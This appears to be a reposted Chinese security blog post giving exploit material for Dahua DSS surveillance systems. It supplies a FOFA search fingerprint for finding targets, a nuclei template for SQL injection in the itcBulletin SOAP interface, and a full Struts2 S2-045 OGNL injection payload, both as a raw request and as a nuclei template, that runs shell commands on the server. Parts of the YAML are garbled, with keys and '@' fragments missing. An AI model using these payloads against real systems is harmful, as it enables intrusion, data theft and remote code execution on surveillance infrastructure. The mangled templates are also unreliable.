大华 DSS SQL注入
fofa指纹 app="dahua-DSS"
漏洞点
http://your-ip/portal/services/itcBulletin?wsdl
nuclei插件
id: dahua-dss-itcBulletin-sqli
info:
name: 大华DSS itcBulletin SQL注入漏洞
author: fgz
severity: high
description: 大华DSS数字监控系统itcBulletin接口存在SQL注入漏洞,攻击者可以利用该漏洞获取数据库敏感信息。
metadata:
app="dahua-DSS" :
requests:
raw:
|+
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: {{Hostname}}
gzip :
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 :
Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'> :
Body> :
deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'> :
<netMarkings>
and (1=1
</netMarkings>
deleteBulletin> :
Body> :
Envelope> :
and :
matchers:
type: dsl
dsl:
'status_code==500 && contains(body,"error code [1105]") && contains(body,"6cfe798ba8e5b85feb50164c59f4bec")'
struts2 OGNL表达式注入
fofa指纹 app="dahua-DSS"
POST /admin/login_login.action HTTP/1.1
Connection: keep-alive
user-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Charsert: GB2312
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAnmUgTEhFhOZpr9z
Cache-Control: no-cache
Pragma: no-cache
Host: xx.xx.xx.xx
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 1022
------WebKitFormBoundaryAnmUgTEhFhOZpr9z
Content-Disposition: form-data; name="pocfile"; filename="%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo test').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
id: dahua-dss-s2-045-rce
info:
name: dahua-dss-s2-045-rce
author: xxx
severity: high
description: dahua-dss-s2-045-rce
tags: dahua-dss
variables:
randtxt: "{{to_lower(rand_text_alpha(8))}}"
http:
- raw:
- |
GET /admin/login_login.action HTTP/1.1
Content-Type: %{(#nike='multipart/form-data').(#dm= .OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance( .opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo {{randtxt}}').(#iswin=( .lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=( .apache.struts2.ServletActionContext@getResponse().getOutputStream())).( .apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
Cookie: JSESSIONID=281F258E40BD1B32C20AA1E2FBC32A15; JSESSIONID=8ED7F0032B2552FBBA811F1EE83BA279
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
Host: {{Hostname}}
Connection: Keep-alive
matchers:
- type: dsl
name: s2-045-rce
dsl:
- "status_code_1 == 200 && contains(body,'{{randtxt}}')"
修复建议
尽快到官网更新补丁,防止服务器被入侵,更新完补丁后对服务器进行全面检查,防止服务器被留后门。
-=[感·谢·阅·读]=-
关于我们
星网实验室成立(starnetlabs)于2021年10月,是智网安云(武汉)信息技术有限公司旗下安全研究院实验室之一,其成员主要来源于国内一线安全厂商或监管执法机构,多名成员取得CISSP,CISP,PMP,CISAW,PTE等国内网络安全圈行业认证证书,该实验室研究员多次参加国内和省内网络安全攻防比赛取得佳绩。实验室主要研究方向:网络安全攻防竞赛、最前沿的攻防技术,云计算安全、物联网安全等。形成一支结构合理、创新能力强的产学研队伍。星网实验室将持续沉淀前沿安全能力,面向产业输出业蓝军网络安全对抗工具、红队攻击武器平台、蜜网平台、大数据安全管理中心等产品,并持续开放各项核心能力,推动产业安全能力建设。护航各行业数字化变革,守护大数据时代的网络安全是星网实验室的使命。
大
佬
,
关
注
一
下
呗
!
往期精选内容
原文始发于微信公众号(星网实验室):大华 DSS SQL注入以及struts2 OGNL表达式注入
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论